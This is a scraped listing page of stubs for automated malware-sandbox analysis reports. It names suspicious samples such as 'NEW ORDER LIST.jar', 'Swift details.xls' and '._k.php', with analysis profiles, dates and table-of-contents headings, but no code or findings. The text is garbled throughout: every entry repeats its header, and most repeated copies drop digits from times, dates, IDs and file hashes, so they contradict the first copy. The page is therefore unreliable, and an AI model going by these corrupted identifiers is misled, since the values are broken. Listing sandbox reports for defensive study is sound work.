ID: Sample Name: NEW ORDER LIST.jar Cookbook: default.jbs Time: 10:19:47 Date: 19/02/2018 Version: ID: 47020 Sample Name: NEW ORDER LIST.jar Cookbook: default.jbs Time: :19:47 Date: 19/02/201 Version: 21.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection Confidence

More information

ID: Cookbook: urldownload.jbs Time: 20:47:24 Date: 09/12/2017 Version:

ID: Cookbook: urldownload.jbs Time: 20:47:24 Date: 09/12/2017 Version: ID: 0 Cookbook: urldownload.jbs Time: 20:4:24 Date: 0/12/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:52:31 Date:

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:52:31 Date: ID: 244 Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:52:31 Date: 05/10/201 Version: 24.0.0 Fire Opal Table of Contents

More information

ID: Cookbook: browseurl.jbs Time: 15:26:33 Date: 16/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 15:26:33 Date: 16/03/2018 Version: ID: 50608 Cookbook: browseurl.jbs Time: 15:26:33 Date: 16/03/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Sample Name: dronefly.apk Cookbook: default.jbs Time: 10:24:54 Date: 07/06/2018 Version:

ID: Sample Name: dronefly.apk Cookbook: default.jbs Time: 10:24:54 Date: 07/06/2018 Version: ID: 001 Sample Name: dronefly.apk Cookbook: default.jbs Time: 10:24:4 Date: 0/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: test Cookbook: default.jbs Time: 09:46:13 Date: 21/05/2018 Version:

ID: Sample Name: test Cookbook: default.jbs Time: 09:46:13 Date: 21/05/2018 Version: ID: 042 Sample Name: test Cookbook: default.jbs Time: 09:4:1 Date: 21/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

More information

ID: Sample Name: Coss, Daniel.vcf Cookbook: default.jbs Time: 15:16:47 Date: 21/06/2018 Version:

ID: Sample Name: Coss, Daniel.vcf Cookbook: default.jbs Time: 15:16:47 Date: 21/06/2018 Version: ID: 6467 Sample Name: Coss, Daniel.vcf Cookbook: default.jbs Time: 15:16:47 Date: 21/06/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751.evaljs.js Cookbook: default.jbs Time: 16:44:00 Date:

ID: Sample Name: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751.evaljs.js Cookbook: default.jbs Time: 16:44:00 Date: ID: 33355 Sample Name: ff2c8cadaa0fd8da138ccefce3e001f53a5dceccd45b15ae23f4d51.evaljs.js Cookbook: default.jbs Time: 1:44:00 Date: 04//201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report

More information

ID: Sample Name: 11#Ucb#Uae#Uc4#Ube#Ue5#Ubb#UaafNOnOJTVYQ.exe Cookbook: default.jbs Time: 09:47:21 Date: 02/02/2018 Version: 20.0.

ID: Sample Name: 11#Ucb#Uae#Uc4#Ube#Ue5#Ubb#UaafNOnOJTVYQ.exe Cookbook: default.jbs Time: 09:47:21 Date: 02/02/2018 Version: 20.0. ID: 4457 Sample Name: #Ucb#Uae#Uc4#Ube#Ue5#Ubb#UaafNOnOJTVYQ.exe Cookbook: default.jbs Time: 09:47:21 Date: 02/02/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General

More information

ID: Sample Name: Swift details.xls Cookbook: defaultwindowsofficecookbook.jbs Time: 17:14:48 Date: 21/06/2018 Version: 22.0.

ID: Sample Name: Swift details.xls Cookbook: defaultwindowsofficecookbook.jbs Time: 17:14:48 Date: 21/06/2018 Version: 22.0. ID: 64992 Sample Name: Swift details.xls Cookbook: defaultwindowsofficecookbook.jbs Time: 17::48 Date: 21/06/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection Confidence

More information

ID: Sample Name: promo_50_ iqy Cookbook: default.jbs Time: 15:01:30 Date: 07/06/2018 Version:

ID: Sample Name: promo_50_ iqy Cookbook: default.jbs Time: 15:01:30 Date: 07/06/2018 Version: ID: 63041 Sample Name: promo_50_57443456.iqy Cookbook: default.jbs Time: 15:01:30 Date: 07/06/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection Confidence

More information

ID: Cookbook: urldownload.jbs Time: 21:28:55 Date: 28/06/2018 Version:

ID: Cookbook: urldownload.jbs Time: 21:28:55 Date: 28/06/2018 Version: ID: 6600 Cookbook: urldownload.jbs Time: 21:2:55 Date: 2/06/201 Version: 23.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature Overview Networking:

More information

ID: Sample Name: 5GeZNwROcB.bin Cookbook: default.jbs Time: 15:22:54 Date: 30/11/2017 Version:

ID: Sample Name: 5GeZNwROcB.bin Cookbook: default.jbs Time: 15:22:54 Date: 30/11/2017 Version: ID: 82 Sample Name: GeZNwROcB.bin Cookbook: default.jbs Time: 1:22:4 Date: 0/11/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: dialog.nvp Cookbook: default.jbs Time: 00:09:12 Date: 10/05/2018 Version:

ID: Sample Name: dialog.nvp Cookbook: default.jbs Time: 00:09:12 Date: 10/05/2018 Version: ID: 09 Sample Name: dialog.nvp Cookbook: default.jbs Time: 00:09:12 Date: 10/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: faktury_pdf.rar Cookbook: default.jbs Time: 12:24:33 Date: 15/12/2017 Version:

ID: Sample Name: faktury_pdf.rar Cookbook: default.jbs Time: 12:24:33 Date: 15/12/2017 Version: ID: 4019 Sample Name: faktury_pdf.rar Cookbook: default.jbs Time: 12:24: Date: 1/12/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Cookbook: urldownload.jbs Time: 23:23:00 Date: 11/01/2018 Version:

ID: Cookbook: urldownload.jbs Time: 23:23:00 Date: 11/01/2018 Version: ID: 42417 Cookbook: urldownload.jbs Time: 23:23:00 Date: 11/01/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

More information

ID: Sample Name: MobaXterm_installer_10.5.msi Cookbook: defaultwindowsmsicookbook.jbs Time: 18:29:36 Date: 25/05/2018 Version: 22.0.

ID: Sample Name: MobaXterm_installer_10.5.msi Cookbook: defaultwindowsmsicookbook.jbs Time: 18:29:36 Date: 25/05/2018 Version: 22.0. ID: 61258 Sample Name: MobaXterm_installer_10.5.msi Cookbook: defaultwindowsmsicookbook.jbs Time: 18:29:36 Date: 25/05/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection

More information

ID: Sample Name: wtf.bat Cookbook: default.jbs Time: 18:32:35 Date: 19/05/2018 Version:

ID: Sample Name: wtf.bat Cookbook: default.jbs Time: 18:32:35 Date: 19/05/2018 Version: ID: 6036 Sample Name: wtf.bat Cookbook: default.jbs Time: 1:32:35 Date: 19/05/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

More information

ID: Cookbook: browseurl.jbs Time: 13:47:53 Date: 16/02/2018 Version:

ID: Cookbook: browseurl.jbs Time: 13:47:53 Date: 16/02/2018 Version: ID: 46703 Cookbook: browseurl.jbs Time: 13:47:53 Date: 16/02/2018 Version: 21.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Sample Name: paint.net install.exe Cookbook: default.jbs Time: 00:46:01 Date: 01/12/2017 Version:

ID: Sample Name: paint.net install.exe Cookbook: default.jbs Time: 00:46:01 Date: 01/12/2017 Version: ID: 38812 Sample Name: paint.net.4.0.19.install.exe Cookbook: default.jbs Time: 00:46:01 Date: 01/12/2017 Version: 20.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: gpg4win exe.sig Cookbook: default.jbs Time: 21:44:31 Date: 02/02/2018 Version:

ID: Sample Name: gpg4win exe.sig Cookbook: default.jbs Time: 21:44:31 Date: 02/02/2018 Version: ID: Sample Name: gpgwin-.0..exe.sig Cookbook: default.jbs Time: 21::1 Date: 02/02/2018 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Cookbook: urldownload.jbs Time: 16:10:39 Date: 07/12/2017 Version:

ID: Cookbook: urldownload.jbs Time: 16:10:39 Date: 07/12/2017 Version: ID: 94 Cookbook: urldownload.jbs Time: 1:10:9 Date: 0/12/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

More information

ID: Cookbook: browseurl.jbs Time: 18:10:52 Date: 18/05/2018 Version:

ID: Cookbook: browseurl.jbs Time: 18:10:52 Date: 18/05/2018 Version: ID: 60306 Cookbook: browseurl.jbs Time: 18:10:52 Date: 18/05/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Sample Name: vlaue.exe Cookbook: default.jbs Time: 18:54:49 Date: 26/01/2018 Version:

ID: Sample Name: vlaue.exe Cookbook: default.jbs Time: 18:54:49 Date: 26/01/2018 Version: ID: 44024 Sample Name: vlaue.exe Cookbook: default.jbs Time: 18:4:49 Date: 2/01/2018 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: oq5wdjgk2r.exe Cookbook: default.jbs Time: 20:25:47 Date: 22/11/2017 Version:

ID: Sample Name: oq5wdjgk2r.exe Cookbook: default.jbs Time: 20:25:47 Date: 22/11/2017 Version: ID: 388 Sample Name: oq5wdjgk2r.exe Cookbook: default.jbs Time: 20:25:4 Date: 22/11/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: PO xls Cookbook: defaultwindowsofficecookbook.jbs Time: 03:13:36 Date: 08/01/2018 Version:

ID: Sample Name: PO xls Cookbook: defaultwindowsofficecookbook.jbs Time: 03:13:36 Date: 08/01/2018 Version: ID: 41861 Sample Name: PO65445465.xls Cookbook: defaultwindowsofficecookbook.jbs Time: 03::36 Date: 08/01/2018 Version: 20.0.0 Table of Contents Analysis Report Overview Information Detection Confidence

More information

ID: Sample Name: Request.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 15:59:16 Date: 22/11/2017 Version:

ID: Sample Name: Request.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 15:59:16 Date: 22/11/2017 Version: ID: 37845 Sample Name: Request.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 15:59:16 Date: 22/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection

More information

ID: Sample Name: SSB SBV Daily Report - Logistics Template DEC '17 (8).xlsm Cookbook: defaultwindowsofficecookbook.jbs Time: 06:35:29 Date:

ID: Sample Name: SSB SBV Daily Report - Logistics Template DEC '17 (8).xlsm Cookbook: defaultwindowsofficecookbook.jbs Time: 06:35:29 Date: ID: 41310 Sample Name: SSB SBV Daily Report - Logistics Template DEC '17 (8).xlsm Cookbook: defaultwindowsofficecookbook.jbs Time: 06:35:29 Date: 31/12/2017 Version: 20.0.0 Table of Contents Analysis Report

More information

ID: Sample Name:._k.php Cookbook: default.jbs Time: 05:41:18 Date: 25/04/2018 Version:

ID: Sample Name:._k.php Cookbook: default.jbs Time: 05:41:18 Date: 25/04/2018 Version: ID: 2 Sample Name:._k.php Cookbook: default.jbs Time: 0:41:1 Date: 2/04/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

More information

ID: Sample Name: Unconfirmed crdownload Cookbook: default.jbs Time: 22:58:07 Date: 08/11/2017 Version:

ID: Sample Name: Unconfirmed crdownload Cookbook: default.jbs Time: 22:58:07 Date: 08/11/2017 Version: ID: 80 Sample Name: Unconfirmed.crdownload Cookbook: default.jbs Time: 22:8:0 Date: 08/11/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection

More information
2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback